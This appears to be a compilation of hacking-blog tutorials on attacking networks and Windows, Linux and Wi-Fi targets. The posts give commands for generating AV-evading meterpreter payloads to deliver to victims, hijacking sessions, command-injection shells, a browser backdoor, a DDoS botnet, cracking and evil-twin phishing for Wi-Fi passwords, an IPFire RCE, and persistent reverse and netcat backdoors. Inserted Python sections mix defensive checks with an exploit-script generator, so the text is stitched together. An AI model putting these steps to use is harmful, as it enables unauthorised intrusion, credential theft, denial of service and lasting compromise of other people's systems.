Channel: Kali Linux Archives - Hacking Articles

Bypass All Antivirus and Hack Remote Windows 10 PC using Hercules


HERCULES is a payload generator built to evade antivirus software. How well its output evades detection depends on the AV product and on how quickly the generated binary gets signatured, so test the payload against the same AV the target runs before relying on it.

First clone the Hercules repository from GitHub:

git clone https://github.com/EgeBalci/HERCULES.git

Now open a Kali Linux terminal in the directory where Hercules was downloaded and run the following command (192.168.0.105 and 4444 are the attacker's listener IP and port, -p is the Metasploit payload to embed and -a the target architecture):

./HERCULES_x64 192.168.0.105 4444 -p windows/meterpreter/reverse_tcp -a 64 -l dynamic

It saves the result as payload.exe. Deliver that executable to the victim using any social engineering technique.

Before the victim runs it, start a listener on the port you specified. The article uses netcat, which waits for the incoming TCP connection on port 4444 (it does not initiate the connection):

nc -l -p 4444

A bare netcat listener only works for a plain shell payload. The windows/meterpreter/reverse_tcp payload used above is staged, so use Metasploit's exploit/multi/handler with the same payload, LHOST and LPORT; the handler delivers the second stage and gives you the meterpreter session.

The post Bypass All Antivirus and Hack Remote Windows 10 PC using Hercules appeared first on Hacking Articles.


Hack your Network through Android Phone using cSploit


First download cSploit from here and install it on your Android phone.

Now open cSploit, select your network and select the target IP that you want to attack.

Now select the MITM option (see the picture below):

Session Hijacker

Now choose the Session Hijacker option (it captures the victim's browser sessions).

Click the start button to begin session hijacking.

Now you will see the result. In my case the victim has 3 tabs open in his browser.

If you want to open a particular session, click on its link and the hijacked session is loaded automatically. (An example is given below.)

Password Sniffer

For this option choose the Password Sniffer tab.

Note: it captures only HTTP (cleartext) passwords; credentials sent over HTTPS are not captured.

Here you can see the result.

Kill Connections

Now choose the Kill Connections option. It cuts the internet connection of the chosen PC on the network.

Redirect

Now choose the Redirect option.

A prompt appears; enter the website address to which you want to redirect the victim's traffic. (This works only for HTTP websites.)

Replace images

Next choose Replace Images (it swaps the images in the victim's current tab).

Now choose the image you want to display in the victim's browser.

Script Injection

Now choose the Script Injection option (it injects a script that shows a message in the victim's browser).

Now choose the Local File option.

A popup appears in the victim's browser with the default message 'This site has been hacked with cSploit'.


Exploiting OS Command Injection in Web Application using Commix


Commix (short for [comm]and [i]njection e[x]ploiter) is an automated tool written by Anastasios Stasinopoulos that can be used by web developers, penetration testers and security researchers to test web applications for bugs, errors or vulnerabilities related to command injection attacks. With this tool it is easy to find and exploit a command injection vulnerability in a given vulnerable parameter or HTTP header.

First of all, install Tamper Data in Firefox; it is used to view and modify HTTP requests. We will use DVWA for testing. DVWA is installed on the target machine with IP 192.168.0.105.

Log in to DVWA, set the security level to low and open the Command Injection tab.

Now open Tamper Data, start tampering, enter any IP address and submit. Tamper Data pops up asking whether to tamper with the request; click Submit on all the pop-ups.

Now open Tamper Data, find the cookie value in the GET request and copy it.

Also copy the POST string from the POST request.

Now open a terminal on Kali Linux and type the following command:

commix --url="http://192.168.0.105/dvwa/vulnerabilities/exec/#" --cookie="security=low; PHPSESSID=nh5ehntedbu7ha97lpm8o8vjm2" --data="ip=192.168.0.105&Submit=Submit"

In the --url field paste the target URL.

In the --cookie field paste the cookie value you copied, and in the --data field paste the POST string you copied, with the target machine's IP in the ip parameter.

After the command runs you get an os-shell on the target machine, from which you can run any command of the target's OS (Windows commands in my case, since the target was Windows).
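The class of bug Commix exploits above, as an added example written for this page (not DVWA's or Commix's code): a vulnerable ping handler that builds a shell command from the ip parameter, beside a hardened version that validates the input and passes an argument vector so no shell ever sees user data. Both functions return the command they would run instead of executing it, so the example runs offline; the function names and the sample attacker input are my own.

```python
"""Command injection: vulnerable and hardened forms of a DVWA-style 'ping <ip>'.

Added example for this page; not code from DVWA or Commix.
"""
from __future__ import annotations

import ipaddress

# Shell metacharacters that let attacker input break out of a command line.
SHELL_METACHARS = ";|&`$(){}<>\n"


def vulnerable_ping_command(ip: str) -> str:
    """Build the string that os.system()/shell_exec() would hand to /bin/sh.

    Nothing stops '192.168.0.105; id' from becoming two commands.
    """
    return "ping -c 1 " + ip


def hardened_ping_command(ip: str) -> list[str]:
    """Validate strictly, then return argv for subprocess.run(argv, shell=False).

    The address is a single argv element, so ';', '|' or '$(...)' inside it
    reach ping as data and are never interpreted by a shell.
    """
    try:
        addr = ipaddress.ip_address(ip.strip())
    except ValueError as exc:
        raise ValueError(f"rejected ip parameter: {ip!r}") from exc
    return ["ping", "-c", "1", str(addr)]


def injection_markers(value: str) -> list[str]:
    """Return the shell metacharacters present in a request parameter.

    Useful as a WAF or log check: '127.0.0.1|whoami' returns ['|'].
    """
    seen: list[str] = []
    for ch in value:
        if ch in SHELL_METACHARS and ch not in seen:
            seen.append(ch)
    return seen


if __name__ == "__main__":
    payload = "192.168.0.105; id"          # constructed attacker input
    print("vulnerable:", vulnerable_ping_command(payload))
    print("markers   :", injection_markers(payload))
    try:
        hardened_ping_command(payload)
    except ValueError as err:
        print("hardened  :", err)
    print("hardened  :", hardened_ping_command("192.168.0.105"))
```

The hardened form rejects anything that is not a literal IP address rather than trying to strip metacharacters; escaping is where most command-injection fixes go wrong.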

Author: Himanshu Gupta is an Information Security Researcher and Technical Writer. You can follow him on LinkedIn.


Hack Remote PC using BrowserBackdoor – JavaScript WebSocket Backdoor


BrowserBackdoor is an Electron application that uses a JavaScript WebSocket Backdoor to connect to the listener.

BrowserBackdoorServer is a WebSocket server that listens for incoming WebSocket connections and creates a command-line interface for sending commands to the remote system.

The JavaScript backdoor in BrowserBackdoor can be used on all browsers that support WebSockets. 

First clone the BrowserBackdoor repository from GitHub:

git clone https://github.com/IMcPwn/browser-backdoor.git

Then run the following steps one by one inside the cloned directory:

cd client

npm install

Now, in the client folder, open index.html in Leafpad and edit the line that holds the listener address: put in your Kali Linux IP (screenshot below).

Next install electron-packager and build the client for all platforms; this creates the BrowserBackdoor application folders for Windows and Linux users:

npm install electron-packager -g

electron-packager . --all

Now go to the server folder in the browser-backdoor directory and run:

bundle install

After that start browser backdoor by typing in terminal:

ruby bbsconsole.rb

Now send the BrowserBackdoor-win32-x64 build to the victim using any social engineering method. When the victim runs the BrowserBackdoor file you get a session, as in the example below.

Type the session command to check the active sessions; it lists each session with its ID number.

Type the target command with the session ID to interact with that session, for example:

target 0

For more options type the help command, which lists all available commands.


Automating Exploitation of Remote PC using Metasploithelper


Metasploit contains port-based modules as well as URI-based modules (for web servers). This tool bridges an Nmap XML file with Metasploit: it generates resource scripts containing the Metasploit modules that match the scanned services, which you can then run against the target servers.

First clone the metasploitHelper repository from GitHub:

git clone https://github.com/milo2012/metasploitHelper.git

Now open the terminal, scan the target with Nmap and store the results in an XML file.

Here the target is 192.168.0.126 and the results are stored in 126.xml:

nmap -sV -oX 126.xml 192.168.0.126

Now enter the metasploitHelper folder and open metasploitHelper.py in Leafpad.

Change the module path in that file to /usr/share/metasploit-framework/modules/ (where Kali keeps the Metasploit modules).

Now run metasploitHelper giving output of the nmap stored above as an input.

python metasploitHelper.py -i 126.xml

The command generates two resource scripts, runAux.rc and runExp.rc.

runAux.rc contains the auxiliary modules and runExp.rc contains the exploit modules.

Now feed those scripts to msfconsole. First run runAux.rc to use the auxiliary modules:

msfconsole  -r  runAux.rc

If an auxiliary module succeeds it shows the result; in my case it found the VNC login password of the target machine.

Now run the runExp.rc script to run all the exploits metasploitHelper matched:

 msfconsole -r runExp.rc

If there is an exploitable vulnerability on the target machine it exploits it and gives a shell or meterpreter, depending on the exploit. In my case it exploited the vsftpd vulnerability to get a reverse shell, after which we can run any command the target OS supports.
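What the tool does internally, as an added example written for this page (not metasploitHelper's own code): parse Nmap's -oX output and emit one resource script of auxiliary modules and one of exploit modules, keyed on the service name and banner of each open port. The XML below is a constructed sample in Nmap's format for the target above; the service-to-module tables are a small subset I chose for illustration, though the module paths in them are real Metasploit modules.

```python
"""Nmap XML -> msfconsole resource scripts, the idea behind metasploitHelper.

Added example for this page, not the tool's own code. SAMPLE_NMAP_XML is a
constructed document in the shape of `nmap -sV -oX` output; the module tables
are a small illustrative subset (the module paths are real Metasploit modules).
"""
import xml.etree.ElementTree as ET

AUX_MODULES = {                       # service name -> auxiliary modules
    "ftp":  ["auxiliary/scanner/ftp/ftp_version", "auxiliary/scanner/ftp/anonymous"],
    "ssh":  ["auxiliary/scanner/ssh/ssh_version"],
    "vnc":  ["auxiliary/scanner/vnc/vnc_login"],
    "http": ["auxiliary/scanner/http/http_version"],
}
EXP_MODULES = {                       # (service, banner substring) -> exploits
    ("ftp", "vsftpd 2.3.4"): ["exploit/unix/ftp/vsftpd_234_backdoor"],
}

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -oX 126.xml 192.168.0.126">
  <host>
    <status state="up"/>
    <address addr="192.168.0.126" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="21"><state state="open"/>
        <service name="ftp" product="vsftpd" version="2.3.4"/></port>
      <port protocol="tcp" portid="22"><state state="open"/>
        <service name="ssh" product="OpenSSH" version="4.7p1"/></port>
      <port protocol="tcp" portid="5900"><state state="open"/>
        <service name="vnc" product="VNC" version="protocol 3.3"/></port>
      <port protocol="tcp" portid="8080"><state state="closed"/>
        <service name="http"/></port>
    </ports>
  </host>
</nmaprun>"""


def parse_open_services(xml_text):
    """Return (ip, port, service_name, banner) for every open port."""
    found = []
    root = ET.fromstring(xml_text)
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        ip = addr.get("addr")
        for port in host.iter("port"):
            state, svc = port.find("state"), port.find("service")
            if state is None or state.get("state") != "open" or svc is None:
                continue        # closed/filtered ports get no modules
            banner = " ".join(x for x in (svc.get("product"), svc.get("version")) if x)
            found.append((ip, int(port.get("portid")), svc.get("name", ""), banner))
    return found


def build_resource_scripts(services):
    """Return (runAux.rc text, runExp.rc text) in msfconsole -r syntax."""
    aux, exp = [], []
    for ip, port, name, banner in services:
        for mod in AUX_MODULES.get(name, []):
            aux += [f"use {mod}", f"set RHOSTS {ip}", f"set RPORT {port}", "run"]
        for (svc, needle), mods in EXP_MODULES.items():
            if svc == name and needle.lower() in banner.lower():
                for mod in mods:
                    exp += [f"use {mod}", f"set RHOSTS {ip}", f"set RPORT {port}", "exploit -j"]
    return "\n".join(aux) + "\n", "\n".join(exp) + "\n"


def write_resource_scripts(xml_path, aux_path="runAux.rc", exp_path="runExp.rc"):
    """Read a real nmap -oX file and write both scripts next to it."""
    with open(xml_path, encoding="utf-8") as fh:
        aux, exp = build_resource_scripts(parse_open_services(fh.read()))
    with open(aux_path, "w", encoding="utf-8") as fh:
        fh.write(aux)
    with open(exp_path, "w", encoding="utf-8") as fh:
        fh.write(exp)


if __name__ == "__main__":
    aux_rc, exp_rc = build_resource_scripts(parse_open_services(SAMPLE_NMAP_XML))
    print("# runAux.rc\n" + aux_rc)
    print("# runExp.rc\n" + exp_rc)
```

Exploit lines use `exploit -j` so each module runs as a background job and msfconsole moves on to the next one instead of blocking on the first session.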

Author: Himanshu Gupta is an Information Security Researcher and Technical Writer. You can follow him on LinkedIn.


How to Create Botnet for D-Dos Attack with UFONet


Remember: this tool is NOT for educational purposes.

Usage of UFONet for attacking targets without prior mutual consent is illegal.

It is the end user's responsibility to obey all applicable local, state and federal laws.

UFONet is a free software tool designed to test DDoS attacks against a target using 'Open Redirect' vectors on third-party web applications, which act as the botnet.

Features

  • Auto-update
  • Clean code (only needs python-pycurl)
  • Documentation with examples
  • Web/GUI Interface
  • Proxy to connect to ‘zombies’ (ex: tor)
  • Change HTTP Headers (User-Agent, Referer, Host…)
  • Configure requests (Timeout, Retries, Delay…)
  • Search for ‘zombies’ on google results (using a pattern or a list of dorks)
  • Test ‘Open Redirect’ vulnerabilities on ‘zombies’
  • Download/Upload ‘zombies’ from Community
  • Inspect a target (HTML objects sizes)
  • Set a place to ‘bit’ on a target (ex: big file)
  • Control number of rounds to attack
  • Apply cache evasion techniques
  • Supports GET/POST
  • Multithreading
  • Different search engines for dorking
  • Web interface
  • Geomapping / Visual data
  • Order ‘zombies’ to attack you for benchmarking

First of all download UFONet from SourceForge at:

https://sourceforge.net/projects/ufonet/

Extract it, enter the folder, open a terminal and list all available options with ./ufonet --help

Now download the list of 'zombies' (open-redirect hosts) that will be used for the attack:

./ufonet --download-zombies

Now type the following command to use the GUI version:

./ufonet --gui

The command opens a browser with the GUI. Click on START MOTHERSHIP.

Now it will open up a GUI with different options.

Now click on Botnet option.

Clicking on Botnet will give many options to configure.

Now clicking on List Zombies will list all the Zombies it will be using for the attack.

Now click on Attack option.

Set the target to your target URL or IP, set the number of rounds as needed and click Start to launch the attack.

As you can see, the first round of the attack starts from multiple zombies, and after a while the host goes down.
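The sites UFONet recruits as 'zombies' are those whose redirect parameter accepts any URL. As an added example written for this page (not UFONet's code), here is the check that keeps an application off such lists: the redirect target is resolved against the site's own base URL the way a browser would, and the resulting host must be on an allowlist. The example.org hosts, function names and sample inputs are my own assumptions.

```python
"""Open-redirect hardening: only redirect to hosts you own.

Added example for this page, not UFONet's code.
"""
from urllib.parse import urljoin, urlsplit

ALLOWED_HOSTS = {"example.org", "www.example.org"}   # assumed site hosts
BASE_URL = "https://example.org/"                    # assumed site base


def is_safe_redirect(target, allowed_hosts=ALLOWED_HOSTS, base=BASE_URL):
    """True only if `target` resolves to an http(s) URL on an allowed host."""
    if not target or any(c in target for c in "\r\n\x00"):
        return False                       # header injection / junk
    # Browsers accept backslashes as path separators: "/\evil.com" == "//evil.com"
    candidate = target.replace("\\", "/")
    # Resolve like a browser: "//evil.com" becomes "https://evil.com",
    # "/account" becomes "https://example.org/account"
    parts = urlsplit(urljoin(base, candidate))
    if parts.scheme not in ("http", "https"):
        return False                       # javascript:, data:, ...
    host = (parts.hostname or "").lower()  # .hostname drops user@ and :port
    return host in allowed_hosts


def choose_location(target, fallback="/", allowed_hosts=ALLOWED_HOSTS, base=BASE_URL):
    """Value for the Location header: the target if safe, else the fallback."""
    return target if is_safe_redirect(target, allowed_hosts, base) else fallback


if __name__ == "__main__":
    for t in ["/account", "https://www.example.org/login", "//evil.com/",
              "/\\evil.com", "https://example.org@evil.com/", "javascript:alert(1)"]:
        print(f"{t!r:35} -> {choose_location(t)}")
```

Validating the resolved hostname, rather than checking that the string "starts with /" or "contains example.org", is what defeats the protocol-relative, backslash and userinfo tricks above.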

Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles, an Information Security Consultant, Social Media Lover and Gadgets


Hack Wireless Network using Airgeddon


Airgeddon is a multi-use bash script for Linux systems to audit wireless networks.

Features

  • Interface mode switcher (Monitor-Managed).
  • DoS over wireless networks with different methods.
  • Assisted Handshake file capture.
  • Cleaning and optimizing Handshake captured files.
  • Offline password decrypt on WPA/WPA2 captured files (dictionary and bruteforce).
  • Compatibility with many Linux distros (see requirements section).
  • Easy targeting and selection in every section.
  • Controlled Exit. Cleaning tasks and temp files. Option to keep monitor mode if desired.
  • Multilanguage support and autodetect OS language feature (see supported languages section).
  • Help hints in every zone/menu for easy use.
  • Auto-update. Script checks for newer version if possible.

First of all clone  airgeddon from git by executing the following command on the terminal:

git clone https://github.com/v1s1t0r1sh3r3/airgeddon.git

Now to launch airgeddon enter the cloned folder and execute command:

./airgeddon.sh

After starting, it takes a moment to check that all the required tools are installed; press Enter when asked.

Now it asks you to select an interface. Select wlan0 for Wi-Fi attacks; in my case I selected 2.

After selecting wlan0 it shows more options. Select option 2 to put wlan0 into monitor mode, so that it can listen to all nearby Wi-Fi networks, and then press ENTER to continue.

Now it shows some new options; select option 5 to enter the Handshake tools menu.

It presents more options; select option 5 to start capturing the handshake and press ENTER when asked. It then asks you to press ENTER again to select the target, so press ENTER.

A new window opens showing the list of available targets. Wait until your target Wi-Fi appears and then hit Ctrl+C.

Now it shows the target list; select your target by entering the ID number from the N column. I selected the network Tenda_3 by entering 6. Press ENTER to continue.

Now it asks you to choose the attack type. Select 2 for the Deauth aireplay attack, which first deauthenticates all clients and then captures the handshake between the router and a reconnecting client. Press ENTER to continue, which opens two windows.

As you can see below, two windows open: one is the deauth attack window and the other is capturing the handshake. Wait until "WPA handshake" appears at the top right of the capture window and then hit Ctrl+C.

It then asks whether you got the handshake, so press y for yes. It asks for the path of the capture file, which defaults to the last capture, so just press ENTER.

Now return to the main menu by pressing 7.

Now crack the password by selecting option 6.

It asks which attack to use to break the password; we select the dictionary attack. It then asks whether to reuse the already selected BSSID and the already selected capture file, so press y at both prompts, and then asks for the path of the dictionary file. Here you can give your own dictionary or one of the wordlists shipped with Kali; I used /usr/share/nmap/nselib/data/passwords.lst. Press ENTER to continue.

Now it starts cracking with aircrack-ng, and if the password is present in the dictionary it shows it, as you can see: KEY FOUND [87654321].


Hack Wi-Fi using Social Engineering with Fluxion (Evil Twin Attack)


Fluxion is a remake of linset by vk439 with fewer bugs and more features. It is compatible with the latest release of Kali (Rolling).

How it works

  • Scan the networks.
  • Capture a handshake (can’t be used without a valid handshake, it’s necessary to verify the password)
  • Use WEB Interface *
  • Launch a Fake AP instance to imitate the original access point
  • Spawns an MDK3 process, which deauthenticates all users connected to the target network, so they can be lured to connect to the Fake AP and enter the WPA password.
  • A fake DNS server is launched in order to capture all DNS requests and redirect them to the host running the script
  • A captive portal is launched in order to serve a page, which prompts the user to enter their WPA password
  • Each submitted password is verified by the handshake captured earlier
  • The attack will automatically terminate, as soon as a correct password is submitted.

First  of all clone Fluxion from github with command :

git clone https://github.com/deltaxflux/fluxion.git

And execute the script from its folder with command:

./fluxion

After starting, it asks you to choose the interface, so select wlan0 by entering 1. It then asks you to select the channel; enter 1 to listen on all channels.

It opens a new window for Wi-Fi monitoring. Wait until your target appears and hit Ctrl+C.

Now it shows the list of available targets; select yours by entering its ID number. In my case I selected ttpl by pressing 2.

Now select option 1 for creating fake AP (access point) and press ENTER.

Now press ENTER to skip, then select 1 to choose aircrack-ng from the handshake-checking options.

Now select option 1 to deauthenticate all clients connected to the target Wi-Fi.

After selecting 1 it opens 2 windows, one capturing the WPA handshake and the other deauthenticating all clients. Once the handshake is captured, enter 1 in the MENU window to check the handshake, without closing the other windows.

After checking the handshake it asks you to choose the web interface, so select 1 and press ENTER.

Now it asks for the language, so select 1 for English and press ENTER.

Now it opens 4 windows, starting the fake AP and deauthenticating the clients of the Wi-Fi network.

The fake AP is now running. The clients cannot stay connected to the original Wi-Fi and are pushed towards our fake AP; when a client opens a browser it is redirected to a login page asking for the WPA password.

When the user enters the correct WPA password all the attacks stop and the password is shown, as in my case: KEY FOUND [rajchandel12345]. (The attacks stop only when the client enters the correct password; each submission is checked against the captured handshake.)



Cracking WiFi Password using Fern WIFi Cracker


Fern Wifi Cracker is a wireless security auditing and attack program written in Python with the Python Qt GUI library. It can crack and recover WEP/WPA/WPS keys and also run other network-based attacks on wireless or Ethernet networks.

Fern comes preinstalled on Kali Linux: go to Applications, then Wireless Attacks, and click on Fern WiFi Cracker.

Now click on Select Interface and choose the wireless interface; this puts it into monitor mode to listen to all nearby Wi-Fi APs. Then click on Scan for Access Points.

After scanning it shows WEP- and WPA-secured networks separately. In my case there is no WEP network and it shows 5 WPA-secured networks, so click on the WPA tab.

Now it shows all the WPA networks. Select your target by clicking on it (in my case I selected ttpl) and then select a dictionary by clicking on Browse in the lower right corner.

Now select your dictionary from your system. I selected nmap.lst from the /usr/share/wordlists/ directory and clicked Open. (You can use your own wordlist or any other.)

Now select Regular Attack and click on WiFi Attack in the top right corner.

Now it prompts with WPA ATTACK REQUIREMENT: at least one client must be connected to the target AP (the handshake is captured when that client reconnects), so click OK.

Clicking OK starts the attack: it first deauthenticates the client, then captures the handshake, then runs the dictionary against it, which recovers the password if it is present in your dictionary. In my case it found my password: WPA KEY: rajchandel12345

Author: Himanshu Gupta is an Information Security Researcher and Technical Writer. You can follow him on LinkedIn.


Detect Hacker in Network using Android Phone


HosTaGe is a mobile honeypot that detects attacks on wireless networks.

First search for the HosTaGe honeypot in the Android Play Store.

Click on the app shown above and install it.

Now, for testing, I start an nmap version scan of the Android device from my system:

nmap -sV 192.168.0.107

Here 192.168.0.107 is the target IP (the phone running HosTaGe).

As you can see, several fake services are running, as shown in the nmap results.

As soon as the nmap scan starts, the Android icon turns red and an alarm is raised.

Author: Himanshu Gupta is an Information Security Researcher and Technical Writer. You can follow him on LinkedIn.


Exploitation in Linux Firewall using IPFire proxy.cgi RCE


IPFire, a free Linux-based open-source firewall distribution, contains a remote command execution vulnerability in the proxy.cgi page in versions before 2.19 Update Core 101.

Exploit Targets

IPFire 2.19

Requirements

Attacker: Kali Linux

Victim PC: Linux

Open a Kali terminal and type msfconsole, then:

use exploit/linux/http/ipfire_proxy_exec

msf exploit(ipfire_proxy_exec) > set rhost 192.168.0.169 (IP of the remote host)

msf exploit(ipfire_proxy_exec) > set rport 444 (the port of the IPFire web interface)

msf exploit(ipfire_proxy_exec) > set password admin (proxy.cgi sits behind the web interface login, so the module needs valid admin credentials)

msf exploit(ipfire_proxy_exec) > exploit


5 ways to Create Permanent Backdoor in Remote PC


First get a meterpreter shell from any known exploit and bypass UAC for better results (the -X option below writes a Run key under HKLM, which needs elevated rights). Then run:

Persistence

run persistence -X -i 10 -p 443 -r 192.168.0.105

-X: connect back when the system boots

-i 10: try to connect back every 10 seconds

-p 443: reverse connection port

-r 192.168.0.105: reverse connection IP (your Kali machine)

After the script runs successfully, reboot the system and start a handler with the same payload, port and IP:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lport 443

set lhost 192.168.0.105

exploit

s4u_persistence

Creates a scheduled task that will run using service-for-user (S4U). This allows the scheduled task to run even as an unprivileged user that is not logged into the device. This will result in lower security context, allowing access to local resources only. The module requires ‘Logon as a batch job’ permissions (SeBatchLogonRight)

use exploit/windows/local/s4u_persistence

msf exploit(s4u_persistence) > set payload windows/meterpreter/reverse_tcp

msf exploit(s4u_persistence) > set lhost 192.168.0.137 (IP address of Kali Linux)

msf exploit(s4u_persistence) > set lport 443

msf exploit(s4u_persistence) > set trigger logon

msf exploit(s4u_persistence) > set session 2

msf exploit(s4u_persistence) > exploit

After the backdoor is created, restart the victim PC; you will see the previous meterpreter session close. Then start a handler (the LPORT must match the 443 set above):

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.0.137

set lport 443

exploit

VSS_PERSISTENCE

This module attempts to create a persistent payload in a new volume shadow copy. It is based on the VSSOwn script originally posted by Tim Tomes and Mark Baggett and has been tested successfully on Windows 7. To achieve persistence through the RUNKEY option, the user account needs a password in order to start a session on the target machine.

First get the meterpreter shell, bypass UAC by any known technique and background the session. Then run the following series of commands:

use exploit/windows/local/vss_persistence

msf exploit(vss_persistence) > set runkey true

msf exploit(vss_persistence) > set schtask true

msf exploit(vss_persistence) > set rhost 192.168.222.137

msf exploit(vss_persistence) > set session 2

msf exploit(vss_persistence) > exploit

Running exploit creates the backdoor and returns a new meterpreter session.

Now background it, switch to the multi handler and set the payload:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.222.135

set lport 4444

exploit

Now restart the victim system; the meterpreter session dies. Run exploit again after the restart and the backdoor gives you a reverse meterpreter shell.

REGISTRY PERSISTENCE

This module installs a payload that is executed at boot. It runs either at user logon or at system startup via a registry value under "CurrentVersion\Run" (depending on privilege and the selected method). The payload is stored entirely in the registry.

First background the meterpreter session and then run:

use exploit/windows/local/registry_persistence

msf exploit(registry_persistence) > set payload windows/meterpreter/reverse_tcp

msf exploit(registry_persistence) > set lhost 192.168.222.135 (IP address of Kali Linux)

msf exploit(registry_persistence) > set lport 4545

msf exploit(registry_persistence) > set startup system

msf exploit(registry_persistence) > set session 1

msf exploit(registry_persistence) > exploit

Now set up your system for the reverse connection. Run the following commands in msfconsole:

use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost 192.168.222.135

set lport 4545

exploit

Now restart the victim PC; your previous meterpreter session dies, so run exploit again. After the restart you get the reverse meterpreter shell, as you can see in my case.

NETCAT

Netcat is a networking utility that reads and writes data across network connections using TCP/IP. Here it is installed as a bind shell that is started from the Run key at every boot.

After getting the meterpreter shell and bypassing UAC, upload nc.exe to the victim:

upload /usr/share/windows-binaries/nc.exe C:\\Windows\\system32

Now set the registry Run value so that nc.exe starts at boot (the doubled backslashes are for meterpreter's reg command; -L keeps listening after a client disconnects, -d detaches from the console, -p sets the port and -e attaches cmd.exe to the connection):

reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v netcat -d 'C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe'

Now drop to a command shell with the shell command and open the port in the victim's firewall by adding an inbound rule (in cmd.exe use double quotes around the rule name):

netsh advfirewall firewall add rule name="netcat" dir=in action=allow protocol=TCP localport=4445

Now check that the rule was added:

netsh advfirewall firewall show rule name="netcat"

As you can see, the firewall rule netcat was added successfully.

After the victim system restarts, connect to the listening port from your terminal:

nc -nv 192.168.0.101 4445

Here 192.168.0.101 is the victim system on which you created the backdoor and 4445 is the port you gave in the registry value.

After the command runs you get the command shell. Note that this is an unauthenticated bind shell: anyone who can reach port 4445 gets a cmd.exe in the context of the logged-on user, so remove the Run value and the firewall rule when the engagement ends.
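The netcat Run-key entry and the persistence script's VBS launcher both leave values under the Run keys, which is where a defender looks first. As an added example written for this page (not Metasploit's or the page's own code), here is a small checker that flags suspicious Run-key values; it runs over a constructed list of entries so it works offline, and on a Windows host read_run_keys() pulls the real values with the standard winreg module. The patterns and the sample entries are my own.

```python
"""Flag Run-key persistence of the kind created above (netcat bind shell,
script dropped in %TEMP%).

Added example for this page. SAMPLE_RUN_ENTRIES is constructed data shaped like
(key, value name, command line) triples read from the Run keys.
"""
import re
import sys

SAMPLE_RUN_ENTRIES = [
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "SecurityHealth",
     r'"C:\Program Files\Windows Defender\MSASCuiL.exe"'),
    (r"HKLM\Software\Microsoft\Windows\CurrentVersion\Run", "netcat",
     r"C:\windows\system32\nc.exe -Ldp 4445 -e cmd.exe"),
    (r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run", "xyzABCdef",
     r'cscript.exe "C:\Users\victim\AppData\Local\Temp\abcdef.vbs"'),
]

# (pattern, reason) pairs; order determines the order of reasons reported.
SUSPICIOUS = [
    (re.compile(r"\bnc(?:at)?\.exe\b", re.I), "netcat binary"),
    (re.compile(r"\s-e\s+cmd(?:\.exe)?\b", re.I), "-e cmd.exe bind/reverse shell"),
    (re.compile(r"\\Temp\\[^\\]+\.vbs\b", re.I), "script in %TEMP% (persistence.rb style)"),
    (re.compile(r"\b(?:wscript|cscript|powershell|mshta|rundll32)\b", re.I),
     "script host launcher"),
]


def flag_run_entries(entries):
    """Return [(key, name, command, [reasons])] for every suspicious entry."""
    hits = []
    for key, name, cmd in entries:
        reasons = [why for rx, why in SUSPICIOUS if rx.search(cmd)]
        if reasons:
            hits.append((key, name, cmd, reasons))
    return hits


def read_run_keys():
    """Windows only: enumerate the HKLM and HKCU Run keys with winreg."""
    import winreg  # standard library, present on Windows builds of Python
    path = r"Software\Microsoft\Windows\CurrentVersion\Run"
    out = []
    for hive, hname in ((winreg.HKEY_LOCAL_MACHINE, "HKLM"),
                        (winreg.HKEY_CURRENT_USER, "HKCU")):
        try:
            with winreg.OpenKey(hive, path) as key:
                i = 0
                while True:
                    try:
                        name, value, _ = winreg.EnumValue(key, i)
                    except OSError:      # no more values
                        break
                    out.append((f"{hname}\\{path}", name, str(value)))
                    i += 1
        except OSError:                  # key missing or access denied
            pass
    return out


if __name__ == "__main__":
    entries = read_run_keys() if sys.platform == "win32" else SAMPLE_RUN_ENTRIES
    for key, name, cmd, reasons in flag_run_entries(entries):
        print(f"[!] {key}\\{name}: {cmd}\n    {', '.join(reasons)}")
```

The patterns are deliberately narrow; a real sweep would also walk RunOnce, the scheduled task store and the services key, which is where the s4u and vss modules above leave their traces.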


Wifi Penetration Testing using Gerix Wifi Cracker


GERIX WIFI CRACKER is a GUI for 802.11 wireless penetration testing that drives aircrack-ng behind its point-and-click interface to crack Wi-Fi passwords.

First of all clone the github repo with command:

git clone https://github.com/J4r3tt/gerix-wifi-cracker-2.git

Now inside the installed directory give the gerix.py file permission to execute with command:

chmod +x gerix.py

and then start the gerix wifi cracker with command:

python gerix.py

Now a GUI window appears. Click on Reload the Wireless Interfaces; when the wireless interface appears, click on it (wlan0 in my case) and then click on Enable/Disable Monitor Mode to switch it from managed to monitor mode.

After enabling monitor mode the interface name changes to wlan0mon and its mode shows as monitor. Now, to scan for wireless networks, select the monitor-mode interface (wlan0mon in my case) and click on Rescan Networks.

After scanning, select your target by clicking on it (in my case I selected tp link) and go to the WPA tab (the target AP uses WPA2 security).

On the WPA tab, go to General Functionalities and click Start Sniffing and Logging; a terminal window appears capturing the packets of the target AP.

Now, without closing the terminal window, go to the WPA Attack section and click Autoload Victim Clients, which loads the victim client's MAC address, then click Client Deauthentication to disconnect the victim so that the handshake can be captured when it reconnects.

As you can see, the WPA handshake is captured, and the same can be seen in the top right corner of the terminal window. Now close the terminal window.

Now crack the password from the capture file: go to the Cracking tab, then to the WPA Bruteforce Cracking section, give the dictionary path in the Add Your Dictionary field and click on Aircrack-ng - Crack WPA Password. (You can also choose another cracking method, such as pyrit or rainbow tables.)

As you can see, it has successfully cracked the password.

Author: Himanshu Gupta is an InfoSec Researcher and Technical Writer. You can follow him on LinkedIn.


Hack Password using Rogue Wi-Fi Access Point Attack (WiFi-Pumpkin)


WiFi-Pumpkin is a framework for rogue Wi-Fi access point attacks. It lets the attacker create a free, open fake Wi-Fi network; as soon as a victim connects, all of their traffic passes through the attacker's machine. Its most useful feature is that if your own internet connection works, the victim gets internet access through the fake AP, which makes the trap far more convincing.

First, to install WiFi-Pumpkin, type in a terminal:

git clone https://github.com/P0cL4bs/WiFi-Pumpkin.git

